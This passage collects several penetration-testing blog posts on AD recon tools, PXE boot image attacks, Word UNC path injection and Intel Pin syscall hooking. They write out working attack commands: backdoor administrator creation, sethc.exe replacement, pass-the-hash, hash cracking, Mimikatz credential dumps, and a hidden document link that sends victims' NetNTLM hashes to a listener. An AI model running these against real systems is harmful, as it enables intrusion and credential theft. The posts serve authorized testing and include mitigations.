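Get-SQLDomainUser -Instance MSSQLSRV04\SQLSERVER2014 -Username sqladmin -Password 'Password123!' -Verbose -UserState Enabled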

The Authentication and Authorization Matrix

Depending on the current user’s security context or the provided credentials, the user may not have access to query AD for information. The tables below illustrate privileges and the corresponding access.

OPENQUERY (Linked server) auth table by Scott Sutherland (@_nullbind)

Current user context (plus any provided domain credential) and the resulting access: 

  • Domain User (Public): No 
  • Domain User (Sysadmin): Yes 
  • SQL Login (Public): No 
  • SQL Login (Sysadmin): No 
  • Domain User (Public) + Provided Domain User: No 
  • Domain User (Sysadmin) + Provided Domain User: Yes 
  • SQL Login (Public) + Provided Domain User: No 
  • SQL Login (Sysadmin) + Provided Domain User: Yes 

OPENROWSET (Ad Hoc query) auth table by Scott Sutherland (@_nullbind)

Current user context (plus any provided domain credential) and the resulting access: 

  • Domain User (Public): No 
  • Domain User (Sysadmin): Yes 
  • SQL Login (Public): No 
  • SQL Login (Sysadmin): Yes 
  • Domain User (Public) + Provided Domain User: No 
  • Domain User (Sysadmin) + Provided Domain User: Yes 
  • SQL Login (Public) + Provided Domain User: No 
  • SQL Login (Sysadmin) + Provided Domain User: Yes 

Conclusion

Recon is an essential first step in assessing the security of an Active Directory environment, and great work has already been done in this space by Will Schroeder (@harmj0y) and others on PowerView. Hopefully these AD recon functions will provide another medium to accomplish the same end. For more information on the newly added AD recon functions, check out the PowerUpSQL wiki!

Dumping Active Directory Domain Info – in Go!

I’ve used NetSPI PowerShell tools and the PowerView toolset to dump information from Active Directory during almost every internal penetration test I’ve done. These tools are a great starting point for gaining insight into an Active Directory environment. Go seems to be gaining popularity for its performance and scalability, so I tried to replicate some of the functionality in my favorite PowerShell tools. goddi (go dump domain info) dumps domain users, groups, domain controllers, and more in CSV output. And it runs on Windows and Linux!

Before going any further, I want to thank Scott Sutherland (@_nullbind) for his help and mentorship. This work is based off of internal tools he created and none of it would be possible without him! This tool is also based on work from Antti Rantasaari, Eric Gruber (@egru), Will Schroeder (@harmj0y), and the PowerView authors.

So Why Go?

Go is fast and supports cross-platform compilation. During testing, goddi managed to cut execution time down to a matter of seconds when compared to its PowerShell counterparts. Go binaries can also be built for Windows, Linux, and macOS, all on the same system. The full list of OS and architecture combinations is listed in the Go GitHub repo. At the time of this blog's release, goddi has been tested on Windows (10 and 8.1) and Kali Linux.
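For example, cross-compilation only requires setting two environment variables before building (output names are illustrative):

GOOS=windows GOARCH=amd64 go build -o goddi-windows-amd64.exe
GOOS=linux GOARCH=amd64 go build -o goddi-linux-amd64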

That isn't to say that there aren't any drawbacks with a Go implementation. The Microsoft ADSI API is much more flexible to work with, especially when creating LDAP queries that run under the current user's security context. goddi requires domain credentials to be explicitly provided on the command line. This can be especially annoying in scenarios where a user's credentials may not be known. If you get access to a box with local Administrator but don't have domain credentials yet, you can run PsExec to get local system. With local system, you can check if you have domain user privileges and then run PowerShell in that context without domain credentials. This functionality is on the roadmap for future development.

Features

Check out the GitHub repo for an up to date list of features. goddi dumps…

  • Domain users
  • Users in privileged user groups (DA, EA, FA)
  • Users with passwords not set to expire
  • User accounts that have been locked or disabled
  • Machine accounts with passwords older than 45 days
  • Domain Computers
  • Domain Controllers
  • Sites and Subnets
  • SPNs
  • Trusted domain relationships
  • Domain Groups
  • Domain OUs
  • Domain Account Policy
  • Domain delegation users
  • Domain GPOs
  • Domain FSMO roles
  • LAPS passwords
  • GPP passwords

Run goddi with the example command below. The CSV output is dumped in the “csv” folder in the current working directory.

goddi-windows-amd64.exe -username=juser -password="Fall2017!" -domain="demo.local" -dc="10.2.9.220" -unsafe


Roadmap

In the future, I would love to see if I can get this tool to operate closer to the ADSI model. Being able to run the tool in the user’s current context would be preferable from a testing standpoint. I would also like to improve how GPP passwords are gathered. Network shares to the target DC are mapped and mounted with the net use and mount commands. While GPP cpassword searching works with these commands, I have not gotten the chance to add robust error handling for corner cases when dealing with underlying OS errors.

GitHub Repo

Check out the goddi GitHub repo for install and usage instructions. I’ll be updating the features list and roadmap there. Comments and commits are welcome! I’m not a Go expert, so I would appreciate any constructive feedback.

Attacks Against Windows PXE Boot Images

If you’ve ever run across insecure PXE boot deployments during a pentest, you know that they can hold a wealth of possibilities for escalation. Gaining access to PXE boot images can provide an attacker with a domain joined system, domain credentials, and lateral or vertical movement opportunities. This blog outlines a number of different methods to elevate privileges and retrieve passwords from PXE boot images. These techniques are separated into three sections: Backdoor attacks, Password Scraping attacks, and Post Login Password Dumps. Many of these attacks will rely on mounting a Windows image and the title will start with “Mount image disk”.

Recommended tools:

General overview:

PXE booting a Windows image with Hyper-V

Create a new VM through the New Virtual Machine Wizard. Follow the guided steps and make sure to choose the “Install an operating system from a network-based installation server” option. Check the settings menu after the wizard is complete and make sure “Legacy Network Adapter” is at the top of the Startup order.


Save and start the VM. The PXE network install should start and begin the Microsoft Deployment Toolkit deployment wizard.


Run through the wizard and start the installation task sequence for the target image. This can take a while.


Mounting a Windows image

Once the setup is completely finished (including the Windows operating system setup), you should have a working Windows VM. Make sure to shut down the VM safely and download the Kali Linux ISO. Go to the Settings menu and choose the location of your DVD drive image file.


Now, change the boot order so that “CD” is at the top of the BIOS startup order.


Save the settings and start the VM. Choose to boot into the “Live (forensic mode)”.


Once Kali is booted, mount the Windows partition with the following sample commands. Make sure to change the example /dev/sda2 partition to match your target disk layout.

fdisk -l
mkdir /mnt/ntfs
mount -t ntfs-3g /dev/sda2 /mnt/ntfs


Backdoor Attacks

1. Add a local Administrator during setup.

This is probably the simplest way to gain elevated access to the system image. After going through the Windows PE boot process, go back into the Settings menu for the VM. Set “IDE” to be at the top in the “Startup order” of the BIOS section.


Save the settings, start the VM, and connect to the console. The VM should enter the initial Windows setup process. Pressing Shift+F10 will bring up a system console. Note that this is different than pressing F8 during the Windows PE deployment phase. Enter the following commands to add your local Administrator user.

net user netspi Password123! /add
net localgroup administrators /add netspi


Check the Administrators group membership.


Now that the user has been created and added to the Administrators group, wait for the VM to finish setup and log in.


Once logged in, you will have local Administrator privileges! We can go a step further and obtain local system with PsExec.

PsExec.exe -i -s cmd.exe


The local system cmd prompt can be used to check if the computer account has domain user privileges. This can be a good starting point for mapping out the domain with a tool like BloodHound/SharpHound.

2. Mount image disk – Add batch or executable files to all users.

The shortcuts or files located in C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup will run when the user logs in at startup. Change directories to the Administrator's Startup directory and create a batch file with the following commands.

@echo off
net user "startup" "password" /add
net localgroup "Administrators" /add "startup"


The batch file will run when the Administrator user logs in. If this attack is combined with attack scenario #4, the Administrator user can log in with a blank password. Check to see that the startup user is created and added to the Administrators group after login.


3. Mount image disk – Overwrite sethc.exe or other accessibility options.

Replacing sethc.exe (Sticky Keys) is a classic privilege escalation technique. sethc.exe is located at %windir%\System32\sethc.exe. The command below copies cmd.exe and renames it to sethc.exe.

cp cmd.exe sethc.exe


If sticky keys is enabled, a local system cmd prompt will pop up when “Shift” is pressed five times in a row.


4. Mount image disk – Use the chntpw tool to overwrite the Administrator password.

The chntpw tool can clear the password for a Windows user. The SAM and SYSTEM files are located in the %windir%\System32\config directory.
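A hedged usage example against the mounted image (chntpw presents an interactive menu; the clear-password option is selected there):

chntpw -u netspi /mnt/ntfs/Windows/System32/config/SAM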


The netspi user’s password is cleared and the account can be logged into without entering a password.


Password Scraping Attacks

5. Scrape VM memory files for passwords during install or login.

My colleague James Houston deserves a huge shout out for coming up with this attack. The general idea here is to use the snapshot or suspension functionality to capture passwords in the VM’s memory. This can be done during the actual PXE boot deployment process, installation, or login steps. This example will retrieve the password for the deployment service account during the MDT deployment process.

The deployment user is used to join computers to the domain in the “Computer Details” step of the deployment task sequence.


At this point, either suspend or take a snapshot of the VM’s current state. In Hyper-V, use the Checkpoint functionality to take a snapshot. Under the Checkpoint menu in Settings, make sure that “Standard checkpoints” is selected. This will ensure application and system memory is captured. The snapshot location is also set in this menu.


Browse to the snapshot file location and look for the corresponding files for your hypervisor.

  • VMWare: .vmem, .vmsn (snapshot memory file), .vmss (suspended memory file)
  • Hyper-V: .BIN, .VSV, .VMRS (virtual machine runtime file)

Since this example uses Hyper-V, copy off the .VMRS file to search for passwords. I used Kali Linux along with strings and grep to locate the service account and password. Searching for keywords like “User” or “Password” is a great start if the username or password was not displayed during the Windows Deployment Wizard.

strings PXEtest.VMRS | grep -C 4 "UserID=deployment"


6. Mount image disk – Review local Unattend/Sysprep files.

Unattend and Sysprep files can contain passwords used for deployment and setup. The following locations contain files related to Sysprep.

  • %windir%\Panther
  • %windir%\Panther\Unattend
  • %windir%\System32\Sysprep

In this case, the unattend.xml file has been sanitized but it is always worth checking these locations for passwords and sensitive information.


7. Mount image disk – Copy the SAM file and pass the hash with the Administrator account.

The SAM and SYSTEM files are located in the %windir%\System32\config directory.


These files can be copied off to your local machine, and Mimikatz can be used to extract the hashes. The Administrator hash can then be used in pass-the-hash attacks with CrackMapExec or Invoke-TheHash.
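For the extraction step, Mimikatz can parse the copied hives offline; a sketch with placeholder file paths:

mimikatz # lsadump::sam /system:C:\temp\SYSTEM /sam:C:\temp\SAM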

crackmapexec smb targetip -u username -H LMHASH:NTHASH

Invoke-SMBExec -Target 192.168.100.20 -Domain TESTDOMAIN -Username TEST -Hash F6F38B793DB6A94BA04A52F1D3EE92F0 -Command "command or launcher to execute" -verbose

This can be an extremely effective technique to elevate privileges if the domain has shared local Administrator passwords.

8. Mount image disk – Copy the SAM file and crack the Administrator account.

Like above, once the SAM and SYSTEM files are copied to your local machine, the Administrator account can be cracked with Hashcat or John the Ripper. A sample Hashcat command is below. Visit the hashcat wiki for setup and basic usage.

hashcat64.bin -m 1000 targethashes.txt wordlist.txt -r crackrule.rule -o cleartextpw.txt --outfile-format 5 --potfile-disable --loopback -w 3

Post Login Password Dumps

Once the techniques above have given access to the PXE booted image, we can dump passwords. Mimikatz is a great tool for password dumping.

sekurlsa::logonpasswords will dump passwords from LSASS memory.


lsadump::secrets dumps the LSA secrets.


vault::cred dumps saved credentials from the Credential Manager. However, if a saved credential is set as a domain password type, this command will not retrieve the credential successfully. The Mimikatz wiki has a good explanation on how to extract these credentials.

Mitigation and Prevention

There are inherent security risks associated with the use of PXE deployments that do not require authentication or authorization of any kind, especially on user LANs. It is highly recommended that PXE installations require credentials to begin the installation process. For example, this can be configured on a distribution server simply by checking “Require a password when computers use PXE” in System Center Configuration Manager.

One of the main takeaways from the attacks above is that applications or software containing sensitive data should not be included in any images. In addition, shared local Administrator passwords or service account passwords should not be used on images (or anywhere else in the domain); if an image is compromised, this limits the risk to other machines on the domain. Finally, PXE deployments should only be made available on isolated networks. Check out these best practices from Microsoft for more information on securing PXE boot deployments.

References

Thanks to Scott Sutherland (@_nullbind), Alex Dolney (@alexdolney), and James Houston for their wisdom and guidance!

  • https://www.vmware.com/products/personal-desktop-virtualization.html
  • https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/about/
  • https://www.kali.org/downloads/
  • https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
  • https://github.com/BloodHoundAD/BloodHound
  • https://github.com/BloodHoundAD/SharpHound
  • https://github.com/byt3bl33d3r/CrackMapExec
  • https://github.com/Kevin-Robertson/Invoke-TheHash
  • https://hashcat.net/wiki/
  • https://github.com/gentilkiwi/mimikatz
  • https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials
  • https://docs.microsoft.com/en-us/sccm/osd/plan-design/security-and-privacy-for-operating-system-deployment

Microsoft Word – UNC Path Injection with Image Linking
https://www.netspi.com/blog/technical-blog/network-pentesting/microsoft-word-unc-path-injection-image-linking/
Tue, 02 Jan 2018

Microsoft Word is an excellent attack vector during a penetration test. From web application penetration tests to red team engagements, Word documents can be used to grab NetNTLM hashes or prove insufficient egress filtering on a network. There has been an abundance of quality research done on Word attack vectors. If you haven’t had a chance yet, make sure to check out the latest blog from netbiosX on capturing NetNTLM hashes via frameset. Using the same core concepts, this blog will cover a slightly different approach: inserting an image via a link.

The following tools will be helpful:

  • Burp Suite (Collaborator client)
  • 7-Zip
  • Inveigh or Responder

Linking an image

To link an image, open the Insert tab and click the Pictures icon. This will bring up the Explorer window. In the file name field, enter the malicious URL, then hit the Insert drop-down and choose "Link to File". A Burp Collaborator link has been used here for easy demonstration.


Once linked, the broken image can be sized down to nothing. This is an added plus if your malicious document will be used in a red team or social engineering engagement.


Make sure to save the changes to the document. Now, whenever this document is opened, Microsoft Word will attempt to resolve the image linked in the document. These requests are logged in the Burp Collaborator client.


Capturing NetNTLM hashes with UNC path injection

Again, the methods discussed here will be similar to the latest blog from netbiosX. Using 7-Zip, extract the files contained in the Word document. The file we want to modify is document.xml.rels, located under your_word_doc.docx\word\_rels. This file contains a list of relationships and their associated targets. The Relationship in question is of type image. Set the Target value to the UNC path of your listening host.
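
After the edit, the image relationship should look something like the following (the Id value and UNC host are illustrative, not taken from the original document; the TargetMode="External" attribute is what causes Word to resolve the target when the document is opened):

<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="\\192.168.0.2\share\image.png" TargetMode="External"/>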


Save the file and copy it back into the Word document with 7-Zip.


Once a user opens the Word document, Inveigh or Responder will capture incoming authentication requests.

PS C:\> Invoke-Inveigh -NBNS N -LLMNR N -ConsoleOutput Y -IP 192.168.0.2 
Inveigh 1.3.1 started at 2017-12-19T17:22:26 
Elevated Privilege Mode = Enabled 
WARNING: Windows Firewall = Enabled 
Primary IP Address = 192.168.0.2 
LLMNR Spoofer = Disabled 
mDNS Spoofer = Disabled 
NBNS Spoofer = Disabled 
SMB Capture = Enabled 
WARNING: HTTP Capture Disabled Due To In Use Port 80 
HTTPS Capture = Disabled 
Machine Account Capture = Disabled 
Real Time Console Output = Enabled 
Real Time File Output = Disabled 
WARNING: Run Stop-Inveigh to stop Inveigh Press any key to stop real time console output
 
2017-12-19T17:23:19 SMB NTLMv2 challenge/response captured from 192.168.0.3(DESKTOP-2QRDJR2): 
Administrator::DESKTOP-2QRDJR2:57[TRUNCATED]cb:091[TRUNCATED]5BC:010[TRUNCATED]02E0032002E00310038003200000000000000000000000000

One of the major advantages of this method is that there is no indication to the end user that Word is attempting to connect to a malicious URL or UNC path. The request is made once the document is opened and there is no URL or UNC path displayed at startup.

Relationship Target enumeration with PowerShell

The method described above is simple, yet extremely powerful, since it abuses trusted, inherent functionality in Microsoft Office. This section describes two simple methods for enumerating relationship targets without using 7-Zip. There are plenty of forensics tool sets, such as Yara, that will do this more efficiently, and this is by no means a comprehensive forensic approach.

The Word.Application COM object can be used to access the contents of the Word document. This can be achieved with a few simple commands. The WordOpenXML property contains the Relationships in the document.

$file = "C:pathtodoc.docx"
$word = New-Object -ComObject Word.Application
$doc = $word.documents.open($file)
$xml = New-Object System.XML.XMLDocument
$xml = $doc.WordOpenXML
$targets = $xml.package.part.xmlData.Relationships.Relationship
$targets | Format-Table
$word.Quit()


This will successfully enumerate all the Relationships in the document along with their corresponding targets. The issue here is that when using the Word.Application COM object, a Word process is started and the URL/UNC path is resolved.


To avoid this, we can use the DocumentFormat.OpenXML library and enumerate all External Relationships in the document. No collaborator requests or authentication requests were captured using this method during testing.

[System.Reflection.Assembly]::LoadFrom("C:\DocumentFormat.OpenXml.dll")
$file = "C:\path\to\doc.docx"
# Open for editing ($true) so relationships can also be deleted later
$doc = [DocumentFormat.OpenXml.Packaging.WordprocessingDocument]::Open($file,$true)
$targets = $doc.MainDocumentPart.ExternalRelationships
$targets
$doc.Close()


Going a step further, the DeleteExternalRelationship method will remove the relationship with the external URL by providing the relationship id.

$doc.MainDocumentPart.DeleteExternalRelationship("rId4")

References

Thanks to Josh Johnson and Karl Fosaaen (@kfosaaen) for their help and contributions.

  • https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/

Dynamic Binary Analysis with Intel Pin
https://www.netspi.com/blog/technical-blog/thick-application-pentesting/dynamic-binary-analysis-intel-pin/
Tue, 30 May 2017

Intro to Intel Pin

Dynamic Binary Instrumentation (DBI) is a technique for analyzing a running program by dynamically injecting analysis code. The added analysis code, or instrumentation code, is run in the context of the instrumented program with access to real, runtime values. DBI is a powerful technique since it does not require the source code for a program, as opposed to static analysis methods. In addition, it can instrument programs that generate code dynamically. To security researchers, DBI frameworks are invaluable tools as they allow for efficient ways to perform fuzzing, control flow analysis, and vulnerability detection with minimal overhead.

For this blog, I’ll explore Intel’s Pin tool and Linux system call hooking. Pin offers a comprehensive framework for creating pin tools to instrument at differing levels of granularity. You can find links to the Pin documentation in the references section. Also check out Gal Diskin’s slides from BlackHat for a more hands-on overview of Pin’s functionality.

Identifying Linux System Calls

The main function of our pin tool example will be to intercept and identify the system calls made by a program. For reference, we can view the Linux x86_64 system call table here: https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/.

This table maps each system call to its number, which we will use to identify the calls our pin tool intercepts.

One of the advantages of DBI is that we do not need the source code for analysis. For the sake of simplicity, the python script below will be our target for instrumentation. We know that it returns the response of a GET request to Google.

import urllib2
page = urllib2.urlopen("https://www.google.com").read()

We can use the strace tool to see the system calls made.

# strace python http.py
execve("/usr/bin/python", ["python", "http.py"], [/* 19 vars */]) = 0
[TRUNCATED]
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
sendto(3, "GET / HTTP/1.1\r\nAccept-Encoding:"..., 117, 0, NULL, 0) = 117
recvfrom(3, "HTTP/1.1 200 OK\r\nDate: Mon, 15 M"..., 8192, 0, NULL, NULL) = 1418
recvfrom(3, "d\"><meta content=\"@GoogleDoodles"..., 7422, 0, NULL, NULL) = 2836
recvfrom(3, "ocation,b=a.href.indexOf(\"#\");if"..., 4586, 0, NULL, NULL) = 4586
recvfrom(3, "b\" value=\"Google Search\" name=\"b"..., 8192, 0, NULL, NULL) = 3154
recvfrom(3, "", 5038, 0, NULL, NULL)    = 0
recvfrom(3, "", 8192, 0, NULL, NULL)    = 0
close(3)                                = 0
[TRUNCATED]

The strace output above gives us an abundance of information to work with, but we will focus on the system calls we want to intercept: sendto and recvfrom. These system calls are used to transmit messages to and from sockets. We can see the arguments provided to both of the system calls and we will try to read those same arguments with our pin tool.

Hooking sendto and recvfrom

The Pin API for system calls starts with two main functions: PIN_AddSyscallEntryFunction and PIN_AddSyscallExitFunction. These functions register callback functions for before and after the execution of the system call, respectively. The registered callback functions allow us to add instrumentation code before and after every system call is executed.

PIN_AddSyscallEntryFunction(&syscallEntryCallback, NULL);
PIN_AddSyscallExitFunction(&syscallExitCallback, NULL);

We can get the system call number with the PIN_GetSyscallNumber function. This function will get the system call number in the current context. Likewise, we can get the arguments for the current system call with PIN_GetSyscallArgument where ‘i’ is the ordinal number of the argument value.

//sendto: 44, recvfrom: 45
PIN_GetSyscallNumber(ctxt, std);
PIN_GetSyscallArgument(ctxt, std, i);

By referencing the man pages for our intercepted system calls we know that the second argument holds a pointer to a buffer containing the message contents to be sent or received. The third argument is the length of that buffer. Once we intercept our system call, we can read the value of the buffer with the code below.

// Arguments 1 and 2 of sendto/recvfrom: message buffer pointer and length
ADDRINT buf = PIN_GetSyscallArgument(ctxt, std, 1);
ADDRINT len = PIN_GetSyscallArgument(ctxt, std, 2);
int buflen = (int)len;
char *bufptr = (char *)buf;
// Walk the buffer byte-by-byte, printing each character
for (int i = 0; i < buflen; i++, bufptr++) {
    fprintf(stdout, "%c", *bufptr);
}

The buffer pointer is our starting point, and we walk byte-by-byte, dereferencing the pointer to read the value at each position until we reach the buffer length. Below is a condensed sketch of the full tool, followed by some example results.
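
This sketch is a simplified version of the example code linked at the end of the post. One caveat: recvfrom's buffer is only populated after the call returns, so a robust tool would defer that read to the syscall exit callback.

#include <cstdio>
#include "pin.H"

// Print the payloads of sendto (44) and recvfrom (45) on x86_64 Linux
VOID syscallEntryCallback(THREADID tid, CONTEXT *ctxt, SYSCALL_STANDARD std, VOID *v)
{
    ADDRINT num = PIN_GetSyscallNumber(ctxt, std);
    if (num != 44 && num != 45) return; // only sendto/recvfrom

    ADDRINT buf = PIN_GetSyscallArgument(ctxt, std, 1); // message buffer
    ADDRINT len = PIN_GetSyscallArgument(ctxt, std, 2); // buffer length

    fprintf(stdout, "systemcall %s: %d\n", num == 44 ? "sendto" : "recvfrom", (int)num);
    char *bufptr = (char *)buf;
    for (int i = 0; i < (int)len; i++, bufptr++) {
        fprintf(stdout, "%c", *bufptr);
    }
}

int main(int argc, char *argv[])
{
    PIN_Init(argc, argv);
    PIN_AddSyscallEntryFunction(syscallEntryCallback, NULL);
    PIN_StartProgram(); // never returns
    return 0;
}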

#../../../pin -t obj-intel64/syscalltest.so -- python http.py
call PIN_AddSyscallEntryFunction
call PIN_AddSyscallExitFunction
call PIN_StartProgram()
[TRUNCATED]
systemcall sendto: 44
buffer start: 0x7ff81ef26eb4
length: 117
GET / HTTP/1.1
Accept-Encoding: identity
Host: www.google.com
Connection: close
User-Agent: Python-urllib/2.7
[TRUNCATED]
systemcall recvfrom: 45
buffer start: 0x5644e5db7934
length: 8192
emtype="https://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp" name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script>
[TRUNCATED]

The output of the example is far from clean, but it does contain the information we want to intercept: the GET request and response. We can identify the system calls associated with network communications and even see the values of the arguments passed back and forth. Imagine if our binary from before sent login credentials in a GET request; we could retrieve that information.

systemcall sendto: 44
buffer start: 0x7f3b3dcf61c4
length: 146
GET /login?user=admin&pass=badpass HTTP/1.1
Accept-Encoding: identity
Host: www.notarealhost.com
Connection: close
User-Agent: Python-urllib/2.7

This example only scratches the surface of the functionality that the Pin framework has to offer. In the future, I hope to create more complex tools for fuzzing.

You can find the example code at https://github.com/NetSPI/Pin.

References
